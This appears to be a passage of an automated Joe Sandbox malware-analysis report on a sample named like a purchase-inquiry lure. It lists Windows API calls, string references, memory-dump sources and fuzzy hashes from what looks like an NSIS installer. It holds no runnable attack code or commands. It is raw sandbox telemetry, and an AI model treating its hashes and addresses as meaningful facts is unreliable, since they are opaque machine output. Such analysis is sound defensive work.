                                                                    • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003,?,?,00434000,00403500,?), ref: 00402E67
                                                                    Strings
                                                                    • Null, xrefs: 00402EE5
                                                                    • Inst, xrefs: 00402ED3
                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                    • soft, xrefs: 00402EDC
                                                                    • Error launching installer, xrefs: 00402E3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                    • API String ID: 4283519449-527102705
                                                                    • Opcode ID: 850620337695c7023bdab0e7163ca5c9099db9983bf24f25e96f826daa09d327
                                                                    • Instruction ID: 8ad5d6c736a045239d332ae2f481ce07f868331e1a87cba88ca9eb01e54a75c5
                                                                    • Opcode Fuzzy Hash: 850620337695c7023bdab0e7163ca5c9099db9983bf24f25e96f826daa09d327
                                                                    • Instruction Fuzzy Hash: 0651E671940206ABDB209F64DE89B9E7BB8EB04394F10407BF904B72D1C7BC9D419BAD
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                    • lstrlenW.KERNEL32(00403160,004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                    • lstrcatW.KERNEL32(004216C8,00403160), ref: 004051D4
                                                                    • SetWindowTextW.USER32(004216C8,004216C8), ref: 004051E6
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                    • String ID: `7~v0}
                                                                    • API String ID: 2531174081-2153329232
                                                                    • Opcode ID: 48f9730a8bf6011ea6331ab33cfc36a895b312cbace33bece7093b226dcfe4f2
                                                                    • Instruction ID: 28a23e93becb388afe58fbbf22e110c81461cbae08fd60e06f08ac54b892b673
                                                                    • Opcode Fuzzy Hash: 48f9730a8bf6011ea6331ab33cfc36a895b312cbace33bece7093b226dcfe4f2
                                                                    • Instruction Fuzzy Hash: 3C218E31900158BBCB219F95DD84ADFBFB8EF55350F10807AF904B62A0C7794A518F68
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404162
                                                                    • GetSysColor.USER32(00000000), ref: 0040417E
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0040418A
                                                                    • SetBkMode.GDI32(?,?), ref: 00404196
                                                                    • GetSysColor.USER32(?), ref: 004041A9
                                                                    • SetBkColor.GDI32(?,?), ref: 004041B9
                                                                    • DeleteObject.GDI32(?), ref: 004041D3
                                                                    • CreateBrushIndirect.GDI32(?), ref: 004041DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                                                    • Instruction ID: 030d9aaba4ad3e93a8394b0be899aa32a9dffcfc2c3f2c4c75d4aa3950b62208
                                                                    • Opcode Fuzzy Hash: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                                                    • Instruction Fuzzy Hash: CE21A4B5804704ABC7209F68DD48B4B7BF8AF41710F048A29F995E62E0C734E944CB55
                                                                    APIs
                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                      • Part of subcall function 00405CD0: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405CE6
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                    • String ID: 9
                                                                    • API String ID: 163830602-2366072709
                                                                    • Opcode ID: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                                                    • Instruction ID: af7b16596185cfa7f969e470bfe402a155c7c568a05af23699f2fbc440ccd5d4
                                                                    • Opcode Fuzzy Hash: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                                                    • Instruction Fuzzy Hash: DF514A74D00219AADF209F94C988AAEB779FF04304F50447BE501F72D0D7B89D42DB69
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A5E
                                                                    • GetMessagePos.USER32 ref: 00404A66
                                                                    • ScreenToClient.USER32(?,?), ref: 00404A80
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A92
                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                                                    • Instruction ID: 24e0014d109499f5a76e1caf6b4fbcffaf68b7ceae62979d4c0808fe7bebc9aa
                                                                    • Opcode Fuzzy Hash: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                                                    • Instruction Fuzzy Hash: A1015271E40219BADB00DB94DD45FFEBBBCAB54711F10012BBB11F62C0D7B4A9018B95
                                                                    APIs
                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                    • MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
                                                                    • wsprintfW.USER32 ref: 00402D5D
                                                                    • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                    Strings
                                                                    • verifying installer: %d%%, xrefs: 00402D57
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                    • String ID: verifying installer: %d%%
                                                                    • API String ID: 1451636040-82062127
                                                                    • Opcode ID: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                                                    • Instruction ID: 3cda0e2316cf55cb202c1321fdb8a93457d01500b45ed37e1556afe5f89d55e5
                                                                    • Opcode Fuzzy Hash: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                                                    • Instruction Fuzzy Hash: 1D014470500209ABEF249F61DD49FEA3B69EB04344F008035FA05A92D0DBB999548B59
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                    • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID: `7~v0}
                                                                    • API String ID: 1849352358-2153329232
                                                                    • Opcode ID: 658c1924fa8f238d90a05b66423510a0a4ae35360fa9b687f360e54937d3183e
                                                                    • Instruction ID: e9fcbf52d61700e0958b70f2e427462db2dea441f2720d4c42107852d76fa8f5
                                                                    • Opcode Fuzzy Hash: 658c1924fa8f238d90a05b66423510a0a4ae35360fa9b687f360e54937d3183e
                                                                    • Instruction Fuzzy Hash: F1F0E172A04104AFD701DBE4DE88CEEBBBDEB48311B104466F601F51A1C674ED418B39
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                                                    • wsprintfW.USER32 ref: 004063D6
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004063EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                    • API String ID: 2200240437-1946221925
                                                                    • Opcode ID: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                                                    • Instruction ID: 69ae2dd3acfd93707f2d49264f8241546f9c5af57f384429b5f7a638f8549ddd
                                                                    • Opcode Fuzzy Hash: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                                                    • Instruction Fuzzy Hash: 6BF0B170910119A7DF14A764DC0DF9B366CA700744F604476AA07F11D1EB7CEB65C7E9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq
                                                                    • API String ID: 0-3003498
                                                                    • Opcode ID: c033da539c32bee1f7683ef67b8cf9d93b731fd85d33e782b2edd8fa8aeea570
                                                                    • Instruction ID: 0335a200313de897b2a09d13a20d78ff67e285c687793c163f68a0ed28b4c64e
                                                                    • Opcode Fuzzy Hash: c033da539c32bee1f7683ef67b8cf9d93b731fd85d33e782b2edd8fa8aeea570
                                                                    • Instruction Fuzzy Hash: 21919174A00309EFEB58DF64C9957AEBBB2BF88340F208429E401AB255EB749D45CB80
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                    • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                    • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                    • CloseHandle.KERNEL32(?), ref: 00402914
                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                    • String ID:
                                                                    • API String ID: 2667972263-0
                                                                    • Opcode ID: 9a3160f5cd84cbbbd2e3a7cb11dde0b3899aca8dbbcd50ea506cda6ea3599f41
                                                                    • Instruction ID: c1a5639659a60ac5c9bd0712390274ed5d57598099091cca2b2fb0d84b3ff26b
                                                                    • Opcode Fuzzy Hash: 9a3160f5cd84cbbbd2e3a7cb11dde0b3899aca8dbbcd50ea506cda6ea3599f41
                                                                    • Instruction Fuzzy Hash: 1621AC72C04128BBCF216FA5CD49D9E7E79EF09324F24023AF520762E1C7795D418BA9
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$wsprintf
                                                                    • String ID: ... %d%%
                                                                    • API String ID: 551687249-2449383134
                                                                    • Opcode ID: 4fb43e65bf4ce807e6280a461f5ece61806fbeac42c13317a2feefb909c66b96
                                                                    • Instruction ID: d56137d6e4a505209b2495a9ad0e903af7b2eaecc34ac4602261a913104377f3
                                                                    • Opcode Fuzzy Hash: 4fb43e65bf4ce807e6280a461f5ece61806fbeac42c13317a2feefb909c66b96
                                                                    • Instruction Fuzzy Hash: 95517A71900219ABCB10CF65D944BAF3FA8AB08766F14457BE911BB2C1C7789E50CBED
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                                    • wsprintfW.USER32 ref: 004049DF
                                                                    • SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                    • String ID: %u.%u%s%s$&B
                                                                    • API String ID: 3540041739-2907463167
                                                                    • Opcode ID: 770447f35da1f277c6ac85a7c0a518b54e4afc88f1f53f93581291e47916563d
                                                                    • Instruction ID: 7355c158aba8d6b586dda53eb311f6ba2c540b654501303b209b4c25e60a8b93
                                                                    • Opcode Fuzzy Hash: 770447f35da1f277c6ac85a7c0a518b54e4afc88f1f53f93581291e47916563d
                                                                    • Instruction Fuzzy Hash: 4711D8736041387BEB10A57D9C41E9F368C9B85374F250237FA26F61D2DA79C81282E8
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !$`7~v0}
                                                                    • API String ID: 1777923405-1519858653
                                                                    • Opcode ID: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                                    • Instruction ID: a86adb03786c756a90e8c754dee758adf3648459c58847ecf436330ca9d5af9c
                                                                    • Opcode Fuzzy Hash: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                                    • Instruction Fuzzy Hash: B121B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A40DB69
                                                                    APIs
                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75C43420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406311
                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                                                    • CharNextW.USER32(?,00000000,75C43420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406325
                                                                    • CharPrevW.USER32(?,?,75C43420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406338
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: *?|<>/":
                                                                    • API String ID: 589700163-165019052
                                                                    • Opcode ID: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                                                    • Instruction ID: 142112f625556876e4cd031ade27854873566ffa35591fc5fadb0a313d070af9
                                                                    • Opcode Fuzzy Hash: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                                                    • Instruction Fuzzy Hash: 0711B616C0021299DB307B19DC40AB7A6E8EF99750B56803FED86732C1E77C5C9286BD
                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(?,?,00436800), ref: 0040568B
                                                                    • GetLastError.KERNEL32 ref: 0040569F
                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B4
                                                                    • GetLastError.KERNEL32 ref: 004056BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                    • String ID: s@
                                                                    • API String ID: 3449924974-2533359417
                                                                    • Opcode ID: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                                    • Instruction ID: 58cf5789918ac3341f57974bf76304b0811093b13c64c6dd82c549f991abc1cf
                                                                    • Opcode Fuzzy Hash: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                                    • Instruction Fuzzy Hash: 6D010871D14219DAEF119FA0D8487EFBFB8EF14354F40853AE909B6190D3799604CFAA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $sq$$sq$$sq$$sq$$sq$$sq
                                                                    • API String ID: 0-3087168343
                                                                    • Opcode ID: 6e91c3078b8f6fbd5c42fd6dc70d6994dac707a06c000df028991ca2c94aafa1
                                                                    • Instruction ID: f5019f37d4e4cbcdc78760a3a478a18f6a8aea89ec08f875fa7565e6a4adbf8a
                                                                    • Opcode Fuzzy Hash: 6e91c3078b8f6fbd5c42fd6dc70d6994dac707a06c000df028991ca2c94aafa1
                                                                    • Instruction Fuzzy Hash: 7EF13C74A00205DFDB59DFA4C4D0A9EBBB3BF88301F248569E405AB355DB79ED86CB80
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                                    • CompareFileTime.KERNEL32(-00000014,?,004095A8,004095A8,00000000,00000000,004095A8,00435000,?,?,00000031), ref: 004017CD
                                                                      • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                                      • Part of subcall function 00405179: lstrlenW.KERNEL32(004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                      • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                      • Part of subcall function 00405179: lstrcatW.KERNEL32(004216C8,00403160), ref: 004051D4
                                                                      • Part of subcall function 00405179: SetWindowTextW.USER32(004216C8,004216C8), ref: 004051E6
                                                                      • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                      • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                      • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
